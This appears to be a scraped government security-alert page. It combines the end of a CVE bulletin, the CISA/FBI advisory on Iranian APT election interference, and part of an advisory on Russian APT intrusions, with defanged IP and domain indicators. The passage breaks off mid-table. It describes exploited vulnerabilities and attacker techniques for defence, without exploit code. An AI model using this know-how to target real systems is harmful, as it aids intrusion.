CONFIRM
wso2 — api_manager
 
WSO2 API Manager 3.1.0 and earlier has reflected XSS on the “publisher” component’s admin interface. More precisely, it is possible to inject an XSS payload into the owner POST parameter, which does not filter user inputs. By putting an XSS payload in place of a valid Owner Name, a modal box appears that writes an error message concatenated to the injected payload (without any form of data encoding). This can also be exploited via CSRF. 2020-10-21 not yet calculated CVE-2020-17454
CONFIRM
xen — xen
 
An issue was discovered in Xen through 4.14.x allowing x86 guest OS users to cause a host OS denial of service, achieve data corruption, or possibly gain privileges by exploiting a race condition that leads to a use-after-free involving 2MiB and 1GiB superpages. 2020-10-22 not yet calculated CVE-2020-27672
MISC
xen — xen
 
An issue was discovered in Xen through 4.14.x allowing x86 HVM and PVH guest OS users to cause a denial of service (data corruption), cause a data leak, or possibly gain privileges because coalescing of per-page IOMMU TLB flushes is mishandled. 2020-10-22 not yet calculated CVE-2020-27671
MISC
xen — xen
 
An issue was discovered in Xen through 4.14.x allowing x86 guest OS users to cause a denial of service (data corruption), cause a data leak, or possibly gain privileges because an AMD IOMMU page-table entry can be half-updated. 2020-10-22 not yet calculated CVE-2020-27670
MISC
xen — xen
 
An issue was discovered in Xen through 4.14.x allowing x86 PV guest OS users to gain guest OS privileges by modifying kernel memory contents, because invalidation of TLB entries is mishandled during use of an INVLPG-like attack technique. 2020-10-22 not yet calculated CVE-2020-27674
MISC
xwiki — xwiki
 
In XWiki before version 12.5 and 11.10.6, any user with SCRIPT right (EDIT right before XWiki 7.4) can gain access to the application server Servlet context which contains tools allowing to instantiate arbitrary Java objects and invoke methods that may lead to arbitrary code execution. This is patched in XWiki 12.5 and XWiki 11.10.6. 2020-10-16 not yet calculated CVE-2020-15252
CONFIRM
MISC
MISC
yubico — yubihsm-shell An issue was discovered in the _send_secure_msg() function of yubihsm-shell through 2.0.2. The function does not validate the embedded length field of a message received from the device. This could lead to an oversized memcpy() call that will crash the running process. This could be used by an attacker to cause a denial of service. 2020-10-19 not yet calculated CVE-2020-24388
MISC
MISC
MISC
MISC
yubico — yubihsm-shell
 
An issue was discovered in the yh_create_session() function of yubihsm-shell through 2.0.2. The function does not explicitly check the returned session id from the device. An invalid session id would lead to out-of-bounds read and write operations in the session array. This could be used by an attacker to cause a denial of service attack. 2020-10-19 not yet calculated CVE-2020-24387
MISC
MISC
MISC
MISC

Back to top

This product is provided subject to this Notification and this Privacy & Use policy.

Categories
alerts

AA20-296B: Iranian Advanced Persistent Threat Actors Threaten Election-Related Systems

Original release date: October 22, 2020<br/><h3>Summary</h3><p>The Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) are warning that Iranian advanced persistent threat (APT) actors are likely intent on influencing and interfering with the U.S. elections to sow discord among voters and undermine public confidence in the U.S. electoral process.</p>

<p>The APT actors are creating fictitious media sites and spoofing legitimate media sites to spread obtained U.S. voter-registration data, anti-American propaganda, and misinformation about voter suppression, voter fraud, and ballot fraud.</p>

<p>The APT actors have historically exploited critical vulnerabilities to conduct distributed denial-of-service (DDoS) attacks, structured query language (SQL) injections attacks, spear-phishing campaigns, website defacements, and disinformation campaigns.&nbsp;</p>

<p>Click here for a <a href=”https://us-cert.cisa.gov/sites/default/files/Joint_CISA_FBI_CSA-AA20-296B_Iranian_APT_Actors_Threaten_Election-Related_Systems.pdf”>PDF</a> version of this report.</p>
<h3>Technical Details</h3><p class=”MsoNormal”>These actors have conducted a significant number of intrusions against U.S.-based networks since August 2019. The actors leveraged several Common Vulnerabilities and Exposures (CVEs)—notably <a href=”https://nvd.nist.gov/vuln/detail/CVE-2020-5902″>CVE-2020-5902</a> and <a href=”https://nvd.nist.gov/vuln/detail/CVE-2017-9248″>CVE-2017-9248</a>—pertaining to virtual private networks (VPNs) and content management systems (CMSs).&nbsp; <o:p></o:p></p>

<p class=”MsoNormal”><o:p></o:p></p>

<ul>
<li><a href=”https://nvd.nist.gov/vuln/detail/CVE-2020-5902″>CVE-2020-5902</a> affects F5 VPNs. Remote attackers could exploit this vulnerability to execute arbitrary code. [<a href=”https://support.f5.com/csp/article/K52145254″>1</a>].</li>
<li><a href=”https://nvd.nist.gov/vuln/detail/CVE-2017-9248″>CVE-2017-9248</a> affects Telerik UI. Attackers could exploit this vulnerability in web applications using Telerik UI for ASP.NET AJAX to conduct cross-site scripting (XSS) attacks.[<a href=”https://www.telerik.com/support/kb/aspnet-ajax/details/cryptographic-weakness”>2</a>]</li>
</ul>

<p>Historically, these actors have conducted DDoS attacks, SQL injections attacks, spear-phishing campaigns, website defacements, and disinformation campaigns. These activities could render these systems temporarily inaccessible to the public or election officials, which could slow, but would not prevent, voting or the reporting of results.</p>

<ul>
<li><strong>A DDoS attack </strong>could slow or render election-related public-facing websites inaccessible by flooding the internet-accessible server with requests; this would prevent users from accessing online resources, such as voting information or non-official voting results. In the past, cyber actors have falsely claimed DDoS attacks have compromised the integrity of voting systems in an effort to mislead the public that their attack would prevent a voter from casting a ballot or change votes already cast.</li>
<li><strong>A SQL injection</strong> involves a threat actor inserting malicious code into the entry field of an application, causing that code to execute if entries have not been sanitized. SQL injections are among the most dangerous and common exploits affecting websites. A SQL injection into a media company’s CMS could enable a cyber actor access to network systems to manipulate content or falsify news reports prior to publication.</li>
<li><strong>Spear-phishing messages</strong> may not be easily detectible. These emails often ask victims to fill out forms or verify information through links embedded in the email. APT actors use spear phishing to gain access to information—often credentials, such as passwords—and to identify follow-on victims. A malicious cyber actor could use compromised email access to spread disinformation to the victims’ contacts or collect information sent to or from the compromised account.</li>
<li><strong>Public-facing website defacements</strong> typically involve a cyber threat actor compromising the website or its associated CMS, allowing the actor to upload images to the site’s landing page. In situations where such public-facing websites relate to elections (e.g., the website of a county board of elections), defacements could cast doubt on the security and legitimacy of the websites’ information. If cyber actors were able to successfully change an election-related website, the underlying data and internal systems would remain uncompromised..</li>
<li><strong>Disinformation campaigns </strong>involve malign actions taken by foreign governments or actors designed to sow discord, manipulate public discourse, or discredit the electoral system. Malicious actors often use social media as well as fictitious and spoofed media sites for these campaigns. Based on their corporate policies, social media companies have worked to counter these actors’ use of their platforms to promote fictitious news stories by removing the news stories, and in many instances, closing the accounts related to the malicious activity. However, these adversaries will continue their attempts to create fictitious accounts that promote divisive storylines to sow discord, even after the election.</li>
</ul>
<h3>Mitigations</h3><p>The following recommended mitigations list includes self-protection strategies against the cyber techniques used by the APT actors:</p>

<ul>
<li>Validate input—input validation is a method of sanitizing untrusted input provided by web application users. Implementing input validation can protect against security flaws of web applications by significantly reducing the probability of successful exploitation. Types of attacks possibly prevented include SQL injection, XSS, and command injection.</li>
<li>Audit your network for systems using Remote Desktop Protocol (RDP) and other internet-facing services. Disable the service if unneeded or install available patches. Users may need to work with their technology vendors to confirm that patches will not affect system processes.</li>
<li>Verify all cloud-based virtual machine instances with a public IP; do not have open RDP ports, unless there is a valid business reason to do so. Place any system with an open RDP port behind a firewall, and require users to use a VPN to access it through the firewall.</li>
<li>Enable strong password requirements and account lockout policies to defend against brute-force attacks.</li>
<li>Apply multi-factor authentication, when possible.</li>
<li>Apply system and software updates regularly, particularly if you are deploying products affected by CVE-2020-5902 and CVE-2017-9248.
<ul>
<li>For patch information on CVE-2020-5902, refer to F5 Security Advisory <a href=”https://support.f5.com/csp/article/K52145254″>K52145254</a>.</li>
<li>For patch information on CVE-2017-9248, refer to <a href=”https://www.telerik.com/support/kb/aspnet-ajax/details/cryptographic-weakness”>Progress Telerik details for CVE-2017-9248</a>.</li>
</ul>
</li>
<li>Maintain a good information back-up strategy that involves routinely backing up all critical data and system configuration information on a separate device. Store the backups offline; verify their integrity and restoration process.</li>
<li>Enable logging and ensure logging mechanisms capture RDP logins. Keep logs for a minimum of 90 days, and review them regularly to detect intrusion attempts.</li>
<li>When creating cloud-based virtual machines, adhere to the cloud provider’s best practices for remote access.</li>
<li>Ensure third parties that require RDP access are required to follow internal policies on remote access.</li>
<li>Minimize network exposure for all control system devices. Where possible, critical devices should not have RDP enabled.</li>
<li>Regulate and limit external to internal RDP connections. When external access to internal resources is required, use secure methods, such as VPNs, recognizing VPNs are only as secure as the connected devices.</li>
<li>Be aware of unsolicited contact on social media from any individual you do not know.</li>
<li>Be aware of attempts to pass links or files via social media from anyone you do not know.</li>
<li>Be aware of unsolicited requests to share a file via online services.</li>
<li>Be aware of email messages conveying suspicious alerts or other online accounts, including login notifications from foreign countries or other alerts indicating attempted unauthorized access to your accounts.</li>
<li>Be suspicious of emails purporting to be from legitimate online services (e.g., the images in the email appear to be slightly pixelated and/or grainy, language in the email seems off, the email originates from an IP address not attributable to the provider/company).</li>
<li>Be suspicious of unsolicited email messages that contain shortened links (e.g., via <code>tinyurl</code>, <code>bit.ly</code>).</li>
<li>Use security features provided by social media platforms, use <a href=”https://us-cert.cisa.gov/ncas/current-activity/2018/03/27/Creating-and-Managing-Strong-Passwords”>strong passwords</a>, change passwords frequently, and use a different password for each social media account.</li>
<li>See CISA’s <a href=”https://us-cert.cisa.gov/ncas/tips/ST19-002″>Tip on Best Practices for Securing Election Systems</a> for more information.</li>
</ul>

<h4>General Mitigations</h4>

<h5>Keep applications and systems updated and patched</h5>

<p>Apply all available software updates and patches; automate this process to the greatest extent possible (e.g., by using an update service provided directly from the vendor). Automating updates and patches is critical because of the speed at which threat actors create exploits after a patch is released. These “N-day” exploits can be as damaging as a zero-day exploits. Vendor updates must also be authentic; updates are typically signed and delivered over protected links to ensure the integrity of the content. Without rapid and thorough patch application, threat actors can operate inside a defender’s patch cycle.[<a href=”https://www.nsa.gov/Portals/70/documents/what-we-do/cybersecurity/professional-resources/csi-nsas-top10-cybersecurity-mitigation-strategies.pdf?v=1″>3</a>] In addition to updating the application, use tools (e.g., the OWASP Dependency-Check Project tool[<a href=”https://owasp.org/www-project-dependency-check/”>4</a>]) to identify publicly known vulnerabilities in third-party libraries that the application depends on.</p>

<h5>Scan web applications for SQL injection and other common web vulnerabilities</h5>

<p>Implement a plan to scan public-facing web servers for common web vulnerabilities (SQL injection, cross-site scripting, etc.); use a commercial web application vulnerability scanner in combination with a source code scanner.[<a href=”https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/defending-against-the-exploitation-of-sql-vulnerabilities-to.cfm”>5</a>] As vulnerabilities are found, they should be fixed or patched. This is especially crucial for networks that host older web applications; as sites get older, more vulnerabilities are discovered and exposed.</p>

<h5>Deploy a web application firewall&nbsp;</h5>

<p>Deploy a web application firewall (WAF) to help prevent invalid input attacks and other attacks destined for the web application. WAFs are intrusion/detection/prevention devices that inspect each web request made to and from the web application to determine if the request is malicious. Some WAFs install on the host system and others are dedicated devices that sit in front of the web application. WAFs also weaken the effectiveness of automated web vulnerability scanning tools.</p>

<h5>Deploy techniques to protect against web shells</h5>

<p>Patch web application vulnerabilities or fix configuration weaknesses that allow web shell attacks, and follow guidance on detecting and preventing web shell malware.[<a href=”https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF”>6</a>] Malicious cyber actors often deploy web shells—software that can enable remote administration—on a victim’s web server. Malicious cyber actors can use web shells to execute arbitrary system commands, which are commonly sent over HTTP or HTTPS. Attackers often create web shells by adding or modifying a file in an existing web application. Web shells provide attackers with persistent access to a compromised network using communications channels disguised to blend in with legitimate traffic. Web shell malware is a long-standing, pervasive threat that continues to evade many security tools.</p>

<h5>Use multi-factor authentication for administrator accounts</h5>

<p>Prioritize protection for accounts with elevated privileges, with remote access, and/or used on high value assets.[<a href=”https://us-cert.cisa.gov/cdm/event/Identifying-and-Protecting-High-Value-Assets-Closer-Look-Governance-Needs-HVAs”>7</a>] Use physical token-based authentication systems to supplement knowledge-based factors such as passwords and personal identification numbers (PINs).[<a href=”https://www.nsa.gov/Portals/70/documents/what-we-do/cybersecurity/professional-resources/csi-nsas-top10-cybersecurity-mitigation-strategies.pdf”>8</a>] Organizations should migrate away from single-factor authentication, such as password-based systems, which are subject to poor user choices and more susceptible to credential theft, forgery, and password reuse across multiple systems.</p>

<h5>Remediate critical web application security risks</h5>

<p>First, identify and remedite critical web application security risks first; then, move on to other less critical vulnerabilities. Follow available guidance on securing web applications.[<a href=”https://apps.nsa.gov/iaarchive/library/ia-guidance/security-tips/building-web-applications-security-recommendations-for.cfm”>9</a>],[<a href=”https://owasp.org/www-project-top-ten/”>10</a>],[<a href=”https://cwe.mitre.org/top25/archive/2020/2020_cwe_top25.html”>11</a>]</p>

<h5>How do I respond to unauthorized access to election-related systems?</h5>

<h6>Implement your security incident response and business continuity plan</h6>

<p>It may take time for your organization’s IT professionals to isolate and remove threats to your systems and restore normal operations. In the meantime, take steps to maintain your organization’s essential functions according to your business continuity plan. Organizations should maintain and regularly test backup plans, disaster recovery plans, and business continuity procedures.</p>

<h6>Contact CISA or law enforcement immediately</h6>

<p>To report an intrusion and to request incident response resources or technical assistance, contact CISA (<a href=”https://us-cert.cisa.govmailto:Central@cisa.dhs.gov”>Central@cisa.dhs.gov</a> or 888-282-0870) or the Federal Bureau of Investigation (FBI) through a local field office or the FBI’s Cyber Division (<a href=”https://us-cert.cisa.govmailto:CyWatch@ic.fbi.gov”>CyWatch@ic.fbi.gov</a> or 855-292-3937).</p>

<h3>Resources</h3>

<ul>
<li><a href=”https://us-cert.cisa.gov/ncas/tips/ST19-002″>CISA Tip:&nbsp;Best Practices for Securing Election Systems</a></li>
<li><a href=”https://us-cert.cisa.gov/ncas/tips/ST16-001″>CISA Tip:&nbsp;Securing Voter Registration Data</a></li>
<li><a href=”https://us-cert.cisa.gov/ncas/tips/ST18-006″>CISA Tip:&nbsp;Website Security</a></li>
<li><a href=”https://us-cert.cisa.gov/ncas/tips/ST04-014″>CISA Tip:&nbsp;Avoiding Social Engineering and Phishing Attacks</a></li>
<li><a href=”https://us-cert.cisa.gov/ncas/tips/ST18-001″>CISA Tip:&nbsp;Securing Network Infrastructure Devices</a></li>
<li><a href=”https://us-cert.cisa.gov/ncas/alerts/aa20-245a”>CISA Activity Alert:&nbsp;Technical Approaches to Uncovering and Remediating Malicious Activity</a></li>
<li><a href=”https://www.cisa.gov/sites/default/files/publications/CISA_Insights_Actions_to_Counter_Email-Based_Attacks_on_Election-Related_S508C.pdf “>CISA Insights: Actions to Counter Email-Based Attacks On Election-related Entities</a></li>
<li>FBI and CISA Public Service Announcement (PSA): <a href=”https://ic3.gov/Media/Y2020/PSA201002″>Spoofed Internet Domains and Email Accounts Pose Cyber and Disinformation Risks to Voters</a></li>
<li>FBI and CISA PSA: <a href=”https://www.ic3.gov/Media/Y2020/PSA201001″>Foreign Actors Likely to Use Online Journals to Spread Disinformation Regarding 2020 Elections</a></li>
<li>FBI and CISA PSA: <a href=”https://www.ic3.gov/Media/Y2020/PSA200930″>Distributed Denial of Service Attacks Could Hinder Access to Voting Information, Would Not Prevent Voting</a></li>
<li>FBI and CISA PSA: <a href=”https://www.ic3.gov/Media/Y2020/PSA200928″>False Claims of Hacked Voter Information Likely Intended to Cast Doubt on Legitimacy of U.S. Elections</a></li>
<li>FBI and CISA PSA: <a href=”https://ic3.gov/Media/Y2020/PSA200924″>Cyber Threats to Voting Processes Could Slow But Not Prevent Voting</a></li>
<li>FBI and CISA PSA: <a href=”https://ic3.gov/Media/Y2020/PSA200922″>Foreign Actors and Cybercriminals Likely to Spread Disinformation Regarding 2020 Election Results</a><br />
&nbsp;</li>
</ul>
<h3>Contact Information</h3><p>To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at <a href=”http://www.fbi.gov/contact-us/field”>www.fbi.gov/contact-us/field</a>, or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at <a href=”https://us-cert.cisa.govmailto:CyWatch@fbi.gov”>CyWatch@fbi.gov</a>. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at <a href=”https://us-cert.cisa.govmailto:Central@cisa.dhs.gov”>Central@cisa.dhs.gov</a>.</p>

<p><o:p></o:p></p>
<h3>References</h3>
<ul> <li><a href=”https://support.f5.com/csp/article/K52145254″>[1] F5 Security Advisory: K52145254: TMUI RCE vulnerability CVE-2020-5902</a></li> <li><a href=”https://www.telerik.com/support/kb/aspnet-ajax/details/cryptographic-weakness”>[2] Progress Telerik details for CVE-2017-9248</a></li> <li><a href=”https://www.nsa.gov/Portals/70/documents/what-we-do/cybersecurity/professional-resources/csi-nsas-top10-cybersecurity-mitigation-strategies.pdf”>[3] NSA “NSA’S Top Ten Cybersecurity Mitigation Strategies</a></li> <li><a href=”https://owasp.org/www-project-dependency-check/”>[4] OWASP Dependency-Check</a></li> <li><a href=”https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/defending-against-the-exploitation-of-sql-vulnerabilities-to.cfm”>[5] NSA “Defending Against the Exploitation of SQL Vulnerabilities to Compromise a Network” </a></li> <li><a href=”https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF”>[6] NSA & ASD “CyberSecurity Information: Detect and Prevent Web Shell Malware” </a></li> <li><a href=”https://us-cert.cisa.gov/cdm/event/Identifying-and-Protecting-High-Value-Assets-Closer-Look-Governance-Needs-HVAs”>[7] CISA: Identifying and Protecting High Value Assets: A Closer Look at Governance Needs for HVAs: </a></li> <li><a href=”https://www.nsa.gov/Portals/70/documents/what-we-do/cybersecurity/professional-resources/csi-nsas-top10-cybersecurity-mitigation-strategies.pdf”>[8] NSA “NSA’S Top Ten Cybersecurity Mitigation Strategies” </a></li> <li><a href=”https://apps.nsa.gov/iaarchive/library/ia-guidance/security-tips/building-web-applications-security-recommendations-for.cfm”>[9] NSA “Building Web Applications – Security for Developers”: </a></li> <li><a href=”https://owasp.org/www-project-top-ten/”>[10] OWASP Top Ten</a></li> <li><a href=”https://cwe.mitre.org/top25/archive/2020/2020_cwe_top25.html”>[11] 2020 CWE Top 25 Most Dangerous Software Weaknesses</a></li> </ul> <h3>Revisions</h3>
<ul> <li>October 22, 2020: Initial Version</li> </ul>
<hr />
<div class=”field field–name-body field–type-text-with-summary field–label-hidden field–item”><p class=”privacy-and-terms”>This product is provided subject to this <a href=”https://us-cert.cisa.gov/privacy/notification”>Notification</a> and this <a href=”https://www.dhs.gov/privacy-policy”>Privacy &amp; Use</a> policy.</p>

</div>

Categories
alerts

AA20-296A: Russian State-Sponsored Advanced Persistent Threat Actor Compromises U.S. Government Targets

Original release date: October 22, 2020 | Last revised: November 17, 2020<br/><h3>Summary</h3><p class=”tip-intro” style=”font-size: 15px;”><em>This joint cybersecurity advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&amp;CK®) framework. See the <a href=”https://attack.mitre.org/versions/v7/”>ATT&amp;CK for Enterprise</a> framework for all referenced threat actor tactics and techniques </em></p>

<p>This joint cybersecurity advisory—written by the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA)—provides information on Russian state-sponsored advanced persistent threat (APT) actor activity targeting various U.S. state, local, territorial, and tribal (SLTT) government networks, as well as aviation networks. This advisory updates joint CISA-FBI cybersecurity advisory <a href=”https://us-cert.cisa.gov/ncas/alerts/aa20-283a”>AA20-283A: APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations</a>.</p>

<p>Since at least September 2020, a Russian state-sponsored APT actor—known variously as Berserk Bear, Energetic Bear, TeamSpy, Dragonfly, Havex, Crouching Yeti, and Koala in open-source reporting—has conducted a campaign against a wide variety of U.S. targets. The Russian state-sponsored APT actor has targeted dozens of SLTT government and aviation networks, attempted intrusions at several SLTT organizations, successfully compromised network infrastructure, and as of October 1, 2020, exfiltrated data from at least two victim servers.</p>

<p>The Russian-sponsored APT actor is obtaining user and administrator credentials to establish initial access, enable lateral movement once inside the network, and locate high value assets in order to exfiltrate data. In at least one compromise, the APT actor laterally traversed an SLTT victim network and accessed documents related to:</p>

<ul>
<li>Sensitive network configurations and passwords.</li>
<li>Standard operating procedures (SOP), such as enrolling in multi-factor authentication (MFA).</li>
<li>IT instructions, such as requesting password resets.</li>
<li>Vendors and purchasing information.</li>
<li>Printing access badges.</li>
</ul>

<p>To date, the FBI and CISA have no information to indicate this APT actor has intentionally disrupted any aviation, education, elections, or government operations. However, the actor may be seeking access to obtain future disruption options, to influence U.S. policies and actions, or to delegitimize SLTT government entities.</p>

<p>As this recent malicious activity has been directed at SLTT government networks, there may be some risk to elections information housed on SLTT government networks. However, the FBI and CISA have no evidence to date that integrity of elections data has been compromised. Due to the heightened awareness surrounding elections infrastructure and the targeting of SLTT government networks, the FBI and CISA will continue to monitor this activity and its proximity to elections infrastructure.</p>

<ul>
<li>Click here for a <a href=”https://us-cert.cisa.gov/sites/default/files/Joint_CISA_FBI_CSA-AA20-296A__Russian_State_Sponsored_APT_Actor_Compromise_US_Government_Targets.pdf”>PDF</a> version of this report.</li>
<li>Click here for a <a href=”https://us-cert.cisa.gov/sites/default/files/2020-10/AA20-296A.stix.xml”>STIX</a> package of IOCs.</li>
</ul>

<h4>U.S. Heat Map of Activity</h4>

<p><a href=”https://indd.adobe.com/view/64463245-3411-49f9-b203-1c7cb8f16769″>Click here</a> for an interactive heat map of this activity. Hovering the cursor over the map reveals the number and type of entities the Russian APT has targeted in each region. These totals include compromises, scanning, or other reconnaissance activity executed from the Russian APT actor infrastructure.</p>

<p><strong>Note</strong>: CISA is committed to providing access to our web pages and documents for individuals with disabilities, both members of the public and federal employees. If the format of any elements or content within this document interferes with your ability to access the information, as defined in the Rehabilitation Act, please email <a href=”https://us-cert.cisa.govmailto: info@us-cert.gov”>info@us-cert.gov</a>. To enable us to respond in a manner most helpful to you, please indicate the nature of your accessibility problem and the preferred format in which to receive the material.</p>

<p><strong>Note</strong>: the heat map has interactive features that may not work in your web browser. For best use, please download and save this catalog.</p>
<h3>Technical Details</h3><p>The FBI and CISA have observed Russian state-sponsored APT actor activity targeting U.S. SLTT government networks, as well as aviation networks. The APT actor is using Turkish IP addresses <code>213.74.101[.]65</code>, <code>213.74.139[.]196</code>, and <code>212.252.30[.]170</code> to connect to victim web servers (<em>Exploit Public Facing Application</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1190/”>T1190</a>]).</p>

<p>The actor is using <code>213.74.101[.]65</code> and <code>213.74.139[.]196</code> to attempt brute force logins and, in several instances, attempted Structured Query Language (SQL) injections on victim websites (<em>Brute Force</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1110″>T1110</a>]; <em>Exploit Public Facing Application</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1190/”>T1190</a>]). The APT actor also hosted malicious domains, including possible aviation sector target <code>columbusairports.microsoftonline[.]host</code>, which resolved to <code>108.177.235[.]92</code> and <code>[cityname].westus2.cloudapp.azure.com</code>; these domains are U.S. registered and are likely SLTT government targets (<em>Drive-By Compromise </em>[<a href=”https://attack.mitre.org/versions/v7/techniques/T1189″>T1189</a>]).</p>

<p>The APT actor scanned for vulnerable Citrix and Microsoft Exchange services and identified vulnerable systems, likely for future exploitation. This actor continues to exploit a Citrix Directory Traversal Bug (<a href=”https://nvd.nist.gov/vuln/detail/CVE-2019-19781″>CVE-2019-19781</a>) and a Microsoft Exchange remote code execution flaw (<a href=”https://nvd.nist.gov/vuln/detail/CVE-2020-0688″>CVE-2020-0688</a>).</p>

<p>The APT actor has been observed using Cisco AnyConnect Secure Socket Layer (SSL) virtual private network (VPN) connections to enable remote logins on at least one victim network, possibly enabled by an Exim Simple Mail Transfer Protocol (SMTP) vulnerability (<a href=”https://nvd.nist.gov/vuln/detail/CVE-2019-10149″>CVE 2019-10149</a>) (<em>External Remote Services</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1133″>T1133</a>]). More recently, the APT actor enumerated and exploited a Fortinet VPN vulnerability (<a href=”https://nvd.nist.gov/vuln/detail/CVE-2018-13379″>CVE-2018-13379</a>) for Initial Access [<a href=”https://attack.mitre.org/versions/v7/tactics/TA0001/”>TA0001</a>] and a Windows Netlogon vulnerability (<a href=”https://nvd.nist.gov/vuln/detail/CVE-2020-1472″>CVE-2020-1472</a>) to obtain access to Windows Active Directory (AD) servers for Privilege Escalation [<a href=”https://attack.mitre.org/versions/v7/tactics/TA0004/”>TA0004</a>] within the network (<em>Valid Accounts</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1078″>T1078</a>]). These vulnerabilities can also be leveraged to compromise other devices on the network (<em>Lateral Movement</em> [<a href=”https://attack.mitre.org/versions/v7/tactics/TA0008/”>TA0008</a>]) and to maintain <em>Persistence</em> [<a href=”https://attack.mitre.org/versions/v7/tactics/TA0003/”>TA0003</a>]).</p>

<p>Between early February and mid-September, these APT actors used <code>213.74.101[.]65</code>, <code>212.252.30[.]170</code>, <code>5.196.167[.]184</code>, <code>37.139.7[.]16</code>, <code>149.56.20[.]55</code>, <code>91.227.68[.]97</code>, and <code>5.45.119[.]124</code> to target U.S. SLTT government networks. Successful authentications—including the compromise of Microsoft Office 365 (O365) accounts—have been observed on at least one victim network (<em>Valid Accounts</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1078″>T1078</a>]).</p>
<h3>Mitigations</h3><h4>Indicators of Compromise</h4>

<p>The APT actor used the following IP addresses and domains to carry out its objectives:</p>

<ul>
<li><code>213.74.101[.]65</code></li>
<li><code>213.74.139[.]196</code></li>
<li><code>212.252.30[.]170</code></li>
<li><code>5.196.167[.]184</code></li>
<li><code>37.139.7[.]16</code></li>
<li><code>149.56.20[.]55</code></li>
<li><code>91.227.68[.]97</code></li>
<li><code>138.201.186[.]43</code></li>
<li><code>5.45.119[.]124</code></li>
<li><code>193.37.212[.]43</code></li>
<li><code>146.0.77[.]60</code></li>
<li><code>51.159.28[.]101</code></li>
<li><code>columbusairports.microsoftonline[.]host</code></li>
<li><code>microsoftonline[.]host</code></li>
<li><code>email.microsoftonline[.]services</code></li>
<li><code>microsoftonline[.]services</code></li>
<li><code>cityname[.]westus2.cloudapp.azure.com</code></li>
</ul>

<p>IP address <code>51.159.28[.]101</code> appears to have been configured to receive stolen Windows New Technology Local Area Network Manager (NTLM) credentials. FBI and CISA recommend organizations take defensive actions to mitigate the risk of leaking NTLM credentials; specifically, organizations should disable NTLM or restrict outgoing NTLM. Organizations should consider blocking IP address <code>51.159.28[.]101</code> (although this action alone may not mitigate the threat, as the APT actor has likely established, or will establish, additional infrastructure points).</p>

<p>Organizations should check available logs for traffic to/from IP address <code>51.159.28[.]101</code> for indications of credential-harvesting activity. As the APT actors likely have—or will—establish additional infrastructure points, organizations should also monitor for Server Message Block (SMB) or WebDAV activity leaving the network to other IP addresses.</p>

<p>Refer to <a href=”https://us-cert.cisa.gov/sites/default/files/publications/AA20-296A.stix.xml”>AA20-296A.stix</a> for a downloadable copy of IOCs.</p>

<h4>Network Defense-in-Depth</h4>

<p>Proper network defense-in-depth and adherence to information security best practices can assist in mitigating the threat and reducing the risk to critical infrastructure. The following guidance may assist organizations in developing network defense procedures.</p>

<ul>
<li>Keep all applications updated according to vendor recommendations, and especially prioritize updates for external facing applications and remote access services to address CVE-2019-19781, CVE-2020-0688, CVE 2019-10149, CVE-2018-13379, and CVE-2020-1472. Refer to table 1 for patch information on these CVEs.</li>
</ul>

<p class=”text-align-center”><em>Table 1: Patch information for CVEs</em></p>

<table border=”1″ cellpadding=”1″ cellspacing=”1″ class=”general-table” style=”width: 881.467px; height: 312px; margin-left: auto; margin-right: auto;”>
<thead>
<tr>
<th scope=”col” style=”width: 198px;”><strong>Vulnerability</strong></th>
<th scope=”col” style=”width: 311px;”><strong>Vulnerable Products</strong></th>
<th scope=”col” style=”width: 356px;”><strong>Patch Information</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td scope=”col” style=”text-align: left; width: 198px;”><a href=”https://nvd.nist.gov/vuln/detail/CVE-2019-19781″>CVE-2019-19781</a></td>
<td scope=”col” style=”text-align: left; width: 311px;”>
<ul>
<li>Citrix Application Delivery Controller</li>
<li>Citrix Gateway</li>
<li>Citrix SDWAN WANOP</li>
</ul>

<p>&nbsp;</p>
</td>
<td scope=”col” style=”text-align: left; width: 356px;”>
<p><a href=”https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/”>Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 11.1 and 12.0</a></p>

<p><a href=”https://www.citrix.com/blogs/2020/01/22/update-on-cve-2019-19781-fixes-now-available-for-citrix-sd-wan-wanop/”>Citrix blog post: security updates for Citrix SD-WAN WANOP release 10.2.6 and 11.0.3</a></p>

<p><a href=”https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/”>Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 12.1 and 13.0</a></p>

<p><a href=”https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/”>Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway version 10.5</a></p>
</td>
</tr>
<tr>
<td scope=”col” style=”text-align: left; width: 198px;”><a href=”https://nvd.nist.gov/vuln/detail/CVE-2020-0688″>CVE-2020-0688</a></td>
<td scope=”col” style=”text-align: left; width: 311px;”>
<ul>
<li>Microsoft Exchange Server 2010 Service Pack 3 Update Rollup 30</li>
<li>Microsoft Exchange Server 2013 Cumulative Update 23</li>
<li>Microsoft Exchange Server 2016 Cumulative Update 14</li>
<li>Microsoft Exchange Server 2016 Cumulative Update 15</li>
<li>Microsoft Exchange Server 2019 Cumulative Update 3</li>
<li>Microsoft Exchange Server 2019 Cumulative Update 4</li>
</ul>

